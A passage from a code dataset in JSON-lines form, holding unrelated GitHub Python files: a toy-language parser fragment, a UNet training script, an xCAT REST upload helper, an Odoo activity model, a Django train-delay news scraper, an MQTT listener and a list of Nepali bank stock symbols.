self._handle_property_acc(expr)\n return expr\n\n def _handle_call(self, expr: Expr) -> CallExpr:\n self.advance() # consume (\n args = self._actual_params()\n # The token does not really matter, it's only for error messages anyways\n expr = CallExpr(expr, self.lookahead, args)\n self.match(TokenType.CL_PAR, \"Expected ')' after function call.\")\n return expr\n\n def _handle_property_acc(self, expr: Expr) -> PropertyAccess:\n self.advance() # consume dot\n name = self.lookahead\n self.match(TokenType.IDENTIFIER, \"Expect identifier after '.'.\")\n return PropertyAccess(expr, name)\n\n def _actual_params(self) -> List[Expr]:\n args = []\n if not self.is_type_in(TokenType.CL_PAR):\n args.append(self._expression())\n while self.is_type_in(TokenType.COMMA):\n self.advance()\n args.append(self._expression())\n\n if len(args) > 127:\n self._parse_error(\"Max number of arguments is 127.\", False)\n return args\n\n def _primary(self) -> Expr:\n if self.is_type_in(TokenType.NUMBER, TokenType.STRING):\n return Literal(self.advance().value)\n if self.is_type_in(TokenType.NIL):\n self.consume()\n return Literal(None)\n if self.is_type_in(TokenType.TRUE):\n self.consume()\n return Literal(True)\n if self.is_type_in(TokenType.FALSE):\n self.consume()\n return Literal(False)\n if self.is_type_in(TokenType.OP_PAR):\n self.consume()\n expr = self._expression()\n self.match(\n TokenType.CL_PAR, \"Unclosed '('. Expected ')' after the expression.\"\n )\n return GroupingExpr(expr)\n if self.is_type_in(TokenType.IDENTIFIER):\n return VarAccess(self.advance())\n if self.is_type_in(TokenType.THIS):\n return ObjRef(self.advance())\n if self.is_type_in(TokenType.SUPER):\n sup = self.advance()\n self.match(TokenType.DOT, \"Expect '.' after 'haha'.\")\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after 'haha.'.\")\n return SuperRef(sup, self.advance())\n\n self._parse_error(\"Token can't be used in an expression.\")\n","repo_name":"JosWrf/waifu_pl","sub_path":"src/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":19825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28238935813","text":"from config import cfg\nimport torch\nfrom dataset.dataset import CTDataset\nfrom dataset.uwmgi import UWMGIDataset\nfrom dataset.nia import NIADataset\nfrom torch.utils.data import DataLoader\nimport segmentation_models_pytorch as smp\nfrom models.unet import UNet\nfrom tqdm import tqdm\nimport torch.optim as optim\nimport os.path as osp\nimport argparse\nfrom config import update_config\nimport wandb\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom eval import iou_coef\nfrom collections import defaultdict\nimport numpy as np\nfrom common.utils.torch_utils import *\n\n\ndef make_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--checkpoint', required=False, help='Path to pretrained checkpoint')\n parser.add_argument('--dataset', required=True, help='Dataset name', choices=['uwmgi', 'nia'])\n parser.add_argument('--cfg',\n help='experiment configure file name',\n required=True,\n type=str)\n parser.add_argument('--data_tag',\n help='data tag (AXL, COR, SAG)',\n required=True)\n parser.add_argument('--device', default='', help='cuda device, i.e. 
0 or 0,1,2,3 or cpu')\n parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')\n parser.add_argument('--use_wandb',\n help='use wandb',\n action='store_true')\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n args = make_args()\n update_config(args.cfg)\n\n use_wandb = args.use_wandb\n tag = args.data_tag\n\n if use_wandb:\n wandb.init(project=f'{cfg.hyp.PROJECT_NAME}-{tag}',\n name=f'{cfg.hyp.OPTIMIZER.TYPE}_lr{cfg.hyp.OPTIMIZER.LR}{args.dataset}')\n wandb.config.update({\n 'batch_size': cfg.batch_size,\n 'num_workers': cfg.num_thread,\n 'optimizer': cfg.hyp.OPTIMIZER.TYPE,\n 'learning_rate': cfg.hyp.OPTIMIZER.LR,\n 'weight_decay': cfg.hyp.OPTIMIZER.WD,\n 'dataset': args.dataset\n })\n # ********************\n # 0. Setting device\n # ********************\n device = select_device(args.device, batch_size=cfg.batch_size)\n world_size = int(os.environ['WORLD_SIZE']) if 'WORLD_SIZE' in os.environ else 1\n global_rank = int(os.environ['RANK']) if 'RANK' in os.environ else -1\n cuda = device.type != 'cpu'\n if args.local_rank != -1:\n assert torch.cuda.device_count() > args.local_rank\n torch.cuda.set_device(args.local_rank)\n device = torch.device('cuda', args.local_rank)\n dist.init_process_group(backend='nccl', init_method='env://') # distributed backend\n assert cfg.batch_size % world_size == 0, '--batch-size must be multiple of CUDA device count'\n\n # ********************\n # 1. Load datasets\n # ********************\n if args.dataset == 'uwgi':\n train_dataset = UWMGIDataset()\n val_dataset = UWMGIDataset()\n elif args.dataset == 'nia':\n train_dataset = NIADataset(data_split='train', tag=tag)\n val_dataset = NIADataset(data_split='val', tag=tag)\n else:\n raise ValueError(f'Dataset name {args.dataset} is not supported yet.')\n\n train_loader = CTDataset(train_dataset, transforms=cfg.data_transforms['train'])\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_loader) if args.local_rank != -1 else None\n train_generator = DataLoader(dataset=train_loader,\n batch_size=int(cfg.batch_size / world_size),\n num_workers=int(cfg.num_thread / world_size),\n pin_memory=True,\n sampler=train_sampler\n )\n\n val_loader = CTDataset(val_dataset, transforms=cfg.data_transforms['train'])\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_loader) if args.local_rank != -1 else None\n val_generator = DataLoader(dataset=val_loader,\n batch_size=int(cfg.batch_size / world_size),\n num_workers=int(cfg.num_thread / world_size),\n pin_memory=True,\n sampler=val_sampler\n )\n # ****************\n # 2. Setting Loss function\n # ****************\n BCELoss = smp.losses.SoftBCEWithLogitsLoss()\n TverskyLoss = smp.losses.TverskyLoss(mode='multilabel', log_loss=False)\n\n # ****************\n # 3. 
Training\n # ****************\n # load model\n model = UNet(in_channels=3, n_classes=len(train_dataset.cat_name), n_channels=48).to(device)\n if args.checkpoint is not None:\n model.load_state_dict(torch.load(args.checkpoint))\n\n # DP mode\n if cuda and global_rank == -1 and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n # DDP mode\n if cuda and global_rank != -1:\n model = DDP(model, device_ids=[args.local_rank], output_device=args.local_rank)\n\n optimizer = optim.Adam(model.parameters(),\n lr=float(cfg.hyp.OPTIMIZER.LR),\n weight_decay=float(cfg.hyp.OPTIMIZER.WD))\n\n for epoch in range(int(cfg.hyp.TRAINING.EPOCHS)):\n pbar = tqdm(enumerate(train_generator), total=len(train_generator), desc=f'Train - epoch: {epoch}')\n tracking_loss = {\n 'Loss': torch.tensor(0.).float(),\n 'BCELoss': torch.tensor(0.).float(),\n 'TverskyLoss': torch.tensor(0.).float(),\n\n 'ValLoss': torch.tensor(0.).float(),\n 'ValBCELoss': torch.tensor(0.).float(),\n 'ValTverskyLoss': torch.tensor(0.).float()\n }\n avg_loss = 0.0\n val_avg_loss = 0.0\n score = defaultdict(list)\n\n for step, (images, masks, _) in pbar:\n B = images.shape[0]\n images = images.to(device, dtype=torch.float)\n masks = masks.to(device, dtype=torch.float)\n\n y_pred = model(images)\n bce_loss = BCELoss(y_pred, masks)\n tversky_loss = TverskyLoss(y_pred, masks)\n losses = 0.5 * bce_loss + 0.5 * tversky_loss\n\n # Gradient update\n optimizer.zero_grad()\n losses.backward()\n optimizer.step()\n\n # tracking loss\n tracking_loss['Loss'] += losses.detach().item() / B / int(cfg.hyp.TRAINING.EPOCHS)\n tracking_loss['BCELoss'] += bce_loss.detach().item() / B / int(cfg.hyp.TRAINING.EPOCHS)\n tracking_loss['TverskyLoss'] += tversky_loss.detach().item() / B / int(cfg.hyp.TRAINING.EPOCHS)\n\n _losses = float(losses.detach().cpu().numpy())\n pbar.set_description(\n f'Epoch {epoch + 1}/{cfg.hyp.TRAINING.EPOCHS} Train Loss - {format(_losses, \".04f\")}')\n\n avg_loss += _losses\n\n pbar.set_description(f'Epoch {epoch+1}/{cfg.hyp.TRAINING.EPOCHS} Train Loss - {format(avg_loss/B, \".04f\")}')\n\n # validation\n vpbar = tqdm(enumerate(val_generator), total=len(val_generator), desc=f'Val - epoch: {epoch}')\n for step, (images, masks, _) in vpbar:\n B = images.shape[0]\n images = images.to(device, dtype=torch.float)\n masks = masks.to(device, dtype=torch.float)\n with torch.no_grad():\n y_pred = model(images)\n val_bce_loss = BCELoss(y_pred, masks)\n val_tversky_loss = TverskyLoss(y_pred, masks)\n val_losses = 0.5 * val_bce_loss + 0.5 * val_tversky_loss\n\n # tracking loss\n tracking_loss['ValLoss'] += val_losses.detach().item() / B / int(cfg.hyp.TRAINING.EPOCHS)\n tracking_loss['ValBCELoss'] += val_bce_loss.detach().item() / B / int(cfg.hyp.TRAINING.EPOCHS)\n tracking_loss['ValTverskyLoss'] += val_tversky_loss.detach().item() / B / int(cfg.hyp.TRAINING.EPOCHS)\n\n # calculate iou\n for iou_thrs in [.50, .95]:\n iou = iou_coef(masks, y_pred)\n iou_score = (iou > iou_thrs).to(torch.float32).mean(dim=(1,0)).cpu().detach().numpy()\n score[f'mAP@{format(iou_thrs,\".2f\")}'].append(float(iou_score))\n\n score_str = ''\n for k, v in score.items():\n score_str += f'{k}:{format(np.mean(v),\".2f\")} '\n vpbar.set_description(f'Validation IoU - {score_str}')\n\n if use_wandb:\n wandb.log(tracking_loss)\n\n # model save\n if (epoch+1) % 10 == 0:\n file_path = osp.join(cfg.model_dir, f'snapshot_{tag}_{epoch}.pt')\n torch.save(model.state_dict(), file_path)\n\n # model save\n file_path = osp.join(cfg.model_dir, 
f'snapshot_{cfg.hyp.TRAINING.EPOCHS}.pt')\n torch.save(model.state_dict(), file_path)\n print('End training')\n","repo_name":"kwonhyeokmin/Unet-seg","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3579197404","text":"#!/usr/bin/env python\n###############################################################################\n# IBM(c) 2018 EPL license http://www.eclipse.org/legal/epl-v10.html\n###############################################################################\n# -*- coding: utf-8 -*-\n#\n\nfrom gevent.subprocess import Popen, PIPE\nimport requests\nimport urllib3\nurllib3.disable_warnings()\n\nimport exceptions as xcat_exception\n\nclass RestSession(object):\n\n def __init__(self):\n self.session = requests.Session()\n self.cookies = None\n\n def request(self, method, url, headers, data=None, timeout=30):\n\n try:\n response = self.session.request(method, url,\n data=data,\n headers=headers,\n verify=False,\n timeout=timeout)\n except requests.exceptions.ConnectionError:\n raise xcat_exception.SelfServerException('Error: Failed to connect to server.')\n\n except requests.exceptions.Timeout:\n raise xcat_exception.SelfServerException('Error: Timeout to connect to server')\n\n if not self.cookies:\n self.cookies = requests.utils.dict_from_cookiejar(self.session.cookies)\n\n return response\n\n def request_upload(self, method, url, headers, files, using_curl=True):\n if using_curl:\n return self._upload_by_curl(method, url, headers, files)\n\n def _upload_by_curl(self, method, url, headers, files):\n\n header_str = ' '.join([ \"%s: %s\" % (k, v) for k,v in headers.items() ])\n request_cmd = 'curl -k -b sid=%s -H \"%s\" -X %s -T %s %s -s' % \\\n (self.cookies['sid'], header_str, method, files, url)\n\n sub = Popen(request_cmd, stdout=PIPE, shell=True)\n response, err = sub.communicate()\n\n if not response:\n error = 'Error: Did not receive response from server after ' \\\n 'running command \\'%s\\'' % request_cmd\n raise SelfServerException(error)\n\n return response\n","repo_name":"chenglch/xcat-core","sub_path":"xCAT-openbmc-py/lib/python/agent/common/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"73734428052","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import ValidationError\n\n\nclass MailActivity(models.Model):\n _inherit = 'mail.activity'\n\n progress_id = fields.Many2one(\n 'mail.activity.progress', 'Progress',\n index=True, ondelete='restrict')\n\n @api.onchange('activity_type_id')\n def _onchange_activity_type_id(self):\n res = super(MailActivity, self)._onchange_activity_type_id()\n if self.activity_type_id not in self.progress_id.activity_type_ids:\n self.progress_id = False\n if not res:\n res = {}\n if 'domain' not in res:\n res['domain'] = {}\n if self.activity_type_id:\n res['domain']['progress_id'] = [\n '|', ('activity_type_ids', 'in', [self.activity_type_id.id]),\n ('activity_type_ids', 'in', [])]\n return res\n res['domain']['progress_id'] = [('activity_type_ids', '=', False)]\n return res\n\n @api.constrains\n def _constrain_progress_activity_type(self):\n for rec in self:\n if rec.progress_id and rec.activity_type_id not in \\\n rec.progress_id.activity_type_ids:\n raise ValidationError(\n _('The progress %s is not allowed for the '\n 'selected activity type %s.') %\n 
(rec.progress_id.name, rec.activity_type_id.name))\n\n @api.multi\n def action_create_calendar_event(self):\n action = super(MailActivity, self).action_create_calendar_event()\n if action.get('context'):\n action['context'].update({\n 'default_progress_id': self.progress_id.id,\n })\n return action\n","repo_name":"ForgeFlow/ao-odoo","sub_path":"mail_activity_progress/models/mail_activity.py","file_name":"mail_activity.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"34848924789","text":"from django.http.response import Http404\nfrom django.shortcuts import render\nfrom train_delay.models import TrainInfo\nfrom train_delay.database_util import check_last_update\nfrom bs4 import BeautifulSoup\nimport requests\n\n# Create your views here.\ndef index(request):\n train_info = TrainInfo.objects.all()\n context = {\n 'information': train_info,\n }\n\n if request.LANGUAGE_CODE == 'ja':\n context['operator_list'] = sorted(list(set([info.operator_ja for info in train_info])))\n elif request.LANGUAGE_CODE == 'en':\n context['operator_list'] = sorted(list(set([info.operator_en for info in train_info])))\n \n return render(request, 'train_delay/index.html', context)\n\n\ndef detail(request, operator_en, railway_en):\n this_railway = TrainInfo.objects.get(operator_en=operator_en, railway_en=railway_en)\n search_keyword = this_railway.railway_ja\n\n while True:\n response = requests.get(f\"https://news.yahoo.co.jp/search?p={search_keyword}&ei=utf-8\")\n soup = BeautifulSoup(response.text, features=\"html.parser\")\n\n titles = [tag.getText() for tag in soup.find_all(name=\"div\", class_=\"newsFeed_item_title\")[:3]]\n\n if len(titles) == 0:\n if \"線\" in search_keyword:\n search_keyword = search_keyword.split(\"線\")[0] + \"線\"\n elif \"ライン\" in search_keyword:\n search_keyword = search_keyword.split(\"ライン\")[0] + \"ライン\"\n continue\n\n links = [tag.get(\"href\") for tag in soup.find_all(name=\"a\", class_=\"newsFeed_item_link\")[:3]] \n all_texts = soup.find_all(\"div\", class_=\"newsFeed_item_text\")[:3]\n texts = [div.select(\".newsFeed_item_text > div:nth-of-type(2)\")[0].get_text() for div in all_texts]\n subtitles = [tag.getText() for tag in soup.find_all(name=\"div\", class_=\"newsFeed_item_sourceWrap\")[:3]]\n break\n\n context = {\n 'information': this_railway,\n 'news_list': [{'title': title, 'link': link, 'text': text, 'subtitle': subtitle} for title, link, text, subtitle in zip(titles, links, texts, subtitles)]\n }\n\n if request.LANGUAGE_CODE == 'ja':\n context['operator_list'] = sorted(list(set([info.operator_ja for info in TrainInfo.objects.all()])))\n elif request.LANGUAGE_CODE == 'en':\n context['operator_list'] = sorted(list(set([info.operator_en for info in TrainInfo.objects.all()])))\n \n return render(request, 'train_delay/detail.html', context)","repo_name":"chanon-lim/team14-g6-train-delay","sub_path":"train_delay/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"24925697711","text":"import paho.mqtt.client as mqtt\nimport database.service as db\nimport time\nimport json\nfrom datetime import datetime\n\nIP = \"164.4.1.1\"\n\ndef on_message(client, userdata, message):\n print(\"Reception\")\n if message.topic == \"fire\":\n jsonmsg = json.loads(str(message.payload.decode(\"utf-8\")))\n db.createFire(jsonmsg[\"date\"], jsonmsg[\"position\"][0], 
jsonmsg[\"position\"][1], jsonmsg[\"intensity\"])\n elif message.topic == \"sensor\":\n jsonmsg = json.loads(str(message.payload.decode(\"utf-8\")))\n db.createSensors(datetime.now(), jsonmsg[\"id\"], jsonmsg[\"intensity\"])\n\n# Informations de connexion à votre broker MQTT : \n# adresse IP\nbroker = IP\n# on se connecte au broker et on publie le message sur le topic\nclient = mqtt.Client(\"S1\")\nclient.on_message=on_message #attach function to callback\nclient.connect(broker, 1884)\nclient.loop_start()\n\n\ndef readBroker():\n while True:\n client.subscribe([(\"fire\", 0), (\"sensor\", 0)])\n time.sleep(1)\n\n\n\n","repo_name":"Emile-Bergin/S7-ProjetScientifique","sub_path":"Application_Module/Grafana_python/MQTT/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2069676930","text":"from box import Box\n\nSTART_URL = {\n \"CommercialBankShare\": Box({\n \"file_location\" : {\n \"W\":\"../../../../../data/commercialBank/weekly.json\",\n \"M\": \"../../../../../data/commercialBank/monthly.json\",\n \"Y\": \"../../../../../data/commercialBank/yearly.json\",\n \"Q\": \"../../../../../data/commercialBank/quaterly.json\",\n \"D\": \"../../../../../data/commercialBank/daily.json\"\n },\n \"links\": [ \n {\"name\": \"Agriculture Development Bank Limited\", \"symbol\": \"ADBL\", \"value\": 397},\n {\"name\": \"Bank of Kathmandu Ltd\", \"symbol\": \"BOKL\", \"value\": 138},\n {\"name\": \"Century Commercial Bank Ltd\", \"symbol\": \"CCBL\", \"value\": 605},\n {\"name\": \"Citizen Bank International Limited\", \"symbol\": \"CZBIL\", \"value\": 348},\n {\"name\": \"Civil Bank Ltd\", \"symbol\":\"CBL\", \"value\": 532},\n {\"name\":\"Everest Bank Limited\", \"symbol\": \"EBL\", \"value\": 137},\n {\"name\": \"Global IME Bank Limited\", \"symbol\": \"GBIME\", \"value\": 341},\n {\"name\": \"Himalayan Bank Limited\", \"symbol\": \"HBL\", \"value\": 134}, \n {\"name\": \"Kumari Bank Limited\", \"symbol\": \"KBL\", \"value\": 142},\n {\"name\": \"Laxmi Bank Limited\", \"symbol\": \"LBL\", \"value\": 141},\n {\"name\": \"Machhapuchhre Bank Limited\", \"symbol\": \"MBL\", \"value\": 140},\n {\"name\": \"Mega Bank Nepal Ltd\", \"symbol\": \"MEGA\", \"value\": 562},\n {\"name\": \"Nabil Bank Limited\", \"symbol\": \"NABIL\", \"value\": 131},\n {\"name\": \"Nepal Bangladesh Bank Limited\", \"symbol\": \"NBB\", \"value\": 136},\n {\"name\": \"Nepal Bank Limited\", \"symbol\": \"NBL\", \"value\": 517},\n {\"name\": \"Nepal Credit And Commercial Bank Limited\", \"symbol\": \"NCCB\", \"value\": 144},\n {\"name\": \"Nepal Investment Bank Limited\", \"symbol\": \"NIB\", \"value\": 132},\n {\"name\": \"Nepal SBI Bank Limited\", \"symbol\": \"SBI\", \"value\": 135},\n {\"name\": \"NIC Asia Bank Ltd\", \"symbol\": \"NICA\", \"value\": 139},\n {\"name\": \"NMB Bank Limited\", \"symbol\": \"NMB\", \"value\": 238},\n {\"name\": \"Prabhu Bank Limited\", \"symbol\": \"PRVU\", \"value\": 255},\n {\"name\": \"Prime Commercial Bank Ltd\", \"symbol\": \"PCBL\", \"value\": 357},\n {\"name\": \"Sanima Bank Limited\", \"symbol\": \"SANIMA\", \"value\":171},\n {\"name\": \"Siddhartha Bank Limited\", \"symbol\": \"SBL\", \"value\": 145}, \n {\"name\": \"Standard Chartered Bank Limited\", \"symbol\": \"SCB\", \"value\":133},\n {\"name\": \"Sunrise Bank Limited\", \"symbol\": \"SRBL\", \"value\": 359}\n ]}),\n \"DevelopmentBank\": Box({\n \"file_location\":{\n 
\"W\":\"../../../../../data/developmentBank/weekly.json\",\n \"M\": \"../../../../../data/developmentBank/monthly.json\",\n \"Y\": \"../../../../../data/developmentBank/yearly.json\",\n \"Q\": \"../../../../../data/developmentBank/quaterly.json\",\n \"D\": \"../../../../../data/developmentBank/daily.json\"\n },\n \"links\": [\n {\"name\": \"Corporate Development Bank Limited\", \"symbol\": \"CORBL\", \"value\": 450},\n {\"name\": \"Deva Bikas Bank Limited\", \"symbol\": \"DBBL\", \"value\": 311},\n {\"name\": \"Excel Development Bank Ltd\", \"symbol\": \"EDBL\", \"value\": 274},\n {\"name\": \"Gandaki Bikas Bank Limited\", \"symbol\": \"GDBL\", \"value\": 420},\n {\"name\": \"Garima Bikas Bank Limited\", \"symbol\": \"GBBL\", \"value\": 417},\n {\"name\": \"Green Development Bank Ltd\", \"symbol\": \"GRDBL\", \"value\": 2744},\n {\"name\": \"Jyoti Bikas Bank Limited\", \"symbol\": \"JBBL\", \"value\": 418},\n {\"name\": \"Kamana Sewa Bikas Bank Limited\", \"symbol\": \"KSBBL\", \"value\": 459}, \n {\"name\": \"Kanchan Development Bank Limited\", \"symbol\": \"KADBL\", \"value\": 505},\n {\"name\": \"Karnali Development Bank Limited\", \"symbol\": \"KRBL\", \"value\": 428},\n {\"name\": \"Lumbini Bikas Bank Ltd\", \"symbol\": \"LBBL\", \"value\": 358},\n {\"name\": \"Mahalaxmi Bikas Bank Ltd\", \"symbol\": \"MLBL\", \"value\": 401},\n {\"name\": \"Miteri Development Bank Limited\", \"symbol\": \"MDB\", \"value\": 371},\n {\"name\": \"Muktinath Bikas Bank Ltd\", \"symbol\": \"MNBBL\", \"value\": 474},\n {\"name\": \"Narayani Development Bank Limited\", \"symbol\": \"NABBC\", \"value\": 172},\n {\"name\": \"Nepal Community Development Bank Ltd\", \"symbol\": \"NCDB\", \"value\": 598},\n {\"name\": \"Sahara Bikas Bank Ltd\", \"symbol\": \"SHBL\", \"value\": 625},\n {\"name\": \"Sahayogi Bikas Bank Limited\", \"symbol\": \"SBBLJ\", \"value\": 174},\n {\"name\": \"Saptakoshi Development Bank Ltd\", \"symbol\": \"SAPDBL\",\"value\": 2860},\n {\"name\": \"Shangrila Development Bank Ltd\", \"symbol\": \"SADBL\",\"value\": 472},\n {\"name\": \"Shine Resunga Development Bank Ltd\", \"symbol\": \"SHINE\", \"value\": 473},\n {\"name\": \"Sindhu Bikash Bank Ltd\", \"symbol\": \"SINDU\", \"value\": 561},\n {\"name\": \"Tinau Mission Development Bank Limited\", \"symbol\": \"TMDBL\", \"value\": 2855}\n ]}),\n \"FinancialBankShare\": Box({\n \"file_location\" : {\n \"W\":\"../../../../../data/financialCompanies/weekly.json\",\n \"M\": \"../../../../../data/financialCompanies/monthly.json\",\n \"Y\": \"../../../../../data/financialCompanies/yearly.json\",\n \"Q\": \"../../../../../data/financialCompanies/quaterly.json\",\n \"D\": \"../../../../../data/financialCompanies/daily.json\"\n },\n \"links\": [ \n {\"name\": \"Best Finance Company Ltd\", \"symbol\": \"BFC\", \"value\": 227},\n {\"name\": \"Capital Merchant Bank & Finance Co. Ltd\", \"symbol\": \"CMB\", \"value\": 259},\n {\"name\": \"Central Finance Co. Ltd\", \"symbol\": \"CFCL\", \"value\": 245},\n {\"name\": \"City Express Finance Co. Limited\", \"symbol\": \"CEFL\", \"value\": 296},\n {\"name\": \"Crystal Finance Ltd\", \"symbol\": \"CFL\", \"value\": 361},\n {\"name\": \"Goodwill Finance Co. Ltd\", \"symbol\": \"GFCL\", \"value\": 232},\n {\"name\": \"Guheshowori Merchant Bank & Finance Co. 
Ltd\", \"symbol\": \"GMFIL\",\"value\": 263},\n {\"name\": \"Gurkhas Finance Ltd\", \"symbol\": \"GUFL\", \"value\": 204},\n {\"name\": \"ICFC Finance Limited\", \"symbol\": \"ICFC\", \"value\": 273},\n {\"name\": \"Janaki Finance Ltd\", \"symbol\": \"JFL\", \"value\": 250},\n {\"name\": \"Lalitpur Finance Ltd.\", \"symbol\": \"LFC\", \"value\": 231},\n {\"name\": \"Manjushree Finance Ltd\", \"symbol\": \"MFIL\", \"value\": 516},\n {\"name\": \"Multipurpose Finance Company Limited\", \"symbol\": \"MPFL\", \"value\": 471},\n {\"name\": \"Nepal Finance Ltd.\", \"symbol\": \"NFS\", \"value\": 194},\n {\"name\": \"Nepal Share Markets Ltd.\", \"symbol\": \"NSM\", \"value\": 200},\n {\"name\": \"Pokhara Finance Ltd\", \"symbol\": \"PFL\", \"value\": 236},\n {\"name\": \"ProgressiveFinance Limited\", \"symbol\": \"PROFL\", \"value\": 338},\n {\"name\": \"Reliance Finance Ltd.\", \"symbol\": \"RLFL\", \"value\": 587},\n {\"name\": \"Samriddhi Finance Company Limited\", \"symbol\": \"SFCL\", \"value\":256},\n {\"name\": \"Shree Investment Finance Co. Ltd.\", \"symbol\": \"SIFC\", \"value\": 244},\n {\"name\": \"Shrijana Finance (Bittaya Sanstha)\", \"symbol\": \"SFFIL\", \"value\": 261},\n {\"name\": \"Synergy Finance Ltd.\", \"symbol\": \"SYFL\", \"value\": 249},\n {\"name\": \"United Finance Ltd.\", \"symbol\": \"UFL\", \"value\": 242}\n ]}),\n \"MicroFinance\": Box({\n \"file_location\": {\n \"W\":\"../../../../../data/microfinance/weekly.json\",\n \"M\": \"../../../../../data/microfinance/monthly.json\",\n \"Y\": \"../../../../../data/microfinance/yearly.json\",\n \"Q\": \"../../../../../data/microfinance/quaterly.json\",\n \"D\": \"../../../../../data/microfinance/daily.json\"\n },\n \"links\": [\n {\"name\": \"Adhikhola Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"AKBSL\", \"value\": 2845},\n {\"name\": \"Arambha Microfinance Bittiya Sanstha Ltd\", \"symbol\": \"AMFI\", \"value\": 2777},\n {\"name\": \"Asha Laghubitta Bittiya Sanstha Ltd\", \"symbol\": \"ALBSL\", \"value\": 2807},\n {\"name\": \"Chhimek Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"CBBL\", \"value\": 164},\n {\"name\": \"Deprosc Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"DDBL\", \"value\": 166},\n {\"name\": \"First Micro Finance Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"FMDBL\", \"value\": 490},\n {\"name\": \"Kalika Laghubitta Bittiya Sanstha Limited\", \"symbol\":\"KMCDB\", \"value\":593},\n {\"name\": \"Nerude Laghubita Bikas Bank Limited\", \"symbol\": \"NLBBL\", \"value\": 396},\n {\"name\": \"Nirdhan Utthan Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"NUBL\", \"value\": 163},\n {\"name\": \"RMDC Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"RMDC\", \"value\": 575},\n {\"name\": \"Sana Kisan Bikas Laghubitta Bittiya sanstha Limited\", \"symbol\": \"SKBBL\", \"value\": 574},\n {\"name\": \"Swarojgar Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"SLBBL\", \"value\": 545},\n {\"name\": \"Summit Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"SMFDB\", \"value\": 502},\n {\"name\": \"Swabalamban Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"SWBBL\", \"value\":268},\n {\"name\": \"Mithila Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"MLBBL\", \"value\":601},\n {\"name\": \"Laxmi Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"LLBS\", \"value\": 618},\n {\"name\": \"Mirmire Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"MMFDB\", \"value\": 682},\n {\"name\": \"Janautthan Samudayic Laghubitta Bikas Bank Ltd.\", \"symbol\": \"JSLBB\", \"value\": 695},\n {\"name\": \"Womi 
Microfinance Bittiya Sanstha Ltd.\", \"symbol\": \"WOMI\", \"value\": 706},\n {\"name\": \"Vijaya laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"VLBS\", \"value\": 687 },\n {\"name\": \"RSDC Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"RSDC\", \"value\": 2748},\n {\"name\": \"NMB Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"NMBMF\", \"value\": 704},\n {\"name\": \"Meromicrofinance Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"MERO\", \"value\": 1741},\n {\"name\": \"National Microfinance Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"NMFBS\", \"value\": 2746},\n {\"name\": \"Suryodaya Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"SLBS\", \"value\": 2750},\n {\"name\": \"Ganapati Microfinance Bittiya Sanstha Ltd\", \"symbol\": \"GMFBS\", \"value\": 2815},\n {\"name\": \"Civil Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"CLBSL\", \"value\": 693},\n {\"name\": \"Infinity Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"ILBS\", \"value\": 2832},\n {\"name\": \"Forward Microfinance Laghubitta Bittiya Sanstha Ltd\", \"symbol\": \"FOWAD\", \"value\": 2758},\n {\"name\": \"Samata Gharelu Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"SMATA\", \"value\": 2761},\n {\"name\": \"Mahuli Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"MSLB\", \"value\": 2768},\n {\"name\": \"Global IME Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"GILB\", \"value\": 705},\n {\"name\": \"Support Microfinance Bittiya Sanstha Ltd.\", \"symbol\": \"SMB\", \"value\": 2771},\n {\"name\": \"Grameen Bikas Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"GBLBS\", \"value\": 583},\n {\"name\": \"Mahila Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"MLBSL\", \"value\": 2925},\n {\"name\": \"Gurans Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"GLBSL\", \"value\": 2826},\n {\"name\": \"NIC Asia Laghubitta Biitiya Sanstha Limited\", \"symbol\": \"NICLBSL\", \"value\": 2887},\n {\"name\": \"Samudayik Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"SLBSL\", \"value\": 2804},\n {\"name\": \"Sadhana Laghubitta Bittiya Sanstha Limited\", \"symbol\": 